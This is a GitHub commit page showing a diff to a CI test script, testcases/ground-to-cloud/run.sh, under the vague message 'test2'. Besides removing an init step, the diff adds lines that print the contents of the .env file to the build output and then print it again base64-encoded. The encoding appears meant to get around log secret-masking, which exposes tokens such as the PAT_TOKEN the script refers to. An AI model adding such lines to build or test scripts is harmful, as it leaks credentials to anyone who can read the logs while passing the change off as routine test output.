Skip to content

Commit 8411751

Browse files
committed
test2
1 parent fa5448e commit 8411751

File tree

1 file changed

+8
-3
lines changed
  • testcases/ground-to-cloud

1 file changed

+8
-3
lines changed

testcases/ground-to-cloud/run.sh

Lines changed: 8 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -31,9 +31,6 @@ else
3131
echo "Warning: PAT_TOKEN environment variable is not set!"
3232
fi
3333

34-
echo "Run init..."
35-
uv run uipath init
36-
3734
echo "Packing agent..."
3835
uv run uipath pack
3936

@@ -55,6 +52,14 @@ echo ""
5552
echo "=== MCP Server Output ==="
5653
cat mcp_server_output.log
5754

55+
echo ""
56+
echo "=== .env File Contents ==="
57+
cat .env
58+
59+
echo ""
60+
echo "=== .env File Base64 Encoded ==="
61+
base64 .env
62+
5863
echo "Test completed with exit code: $TEST_EXIT_CODE"
5964
# Cleanup will happen automatically due to trap
6065
exit $TEST_EXIT_CODE

0 commit comments

Comments
 (0)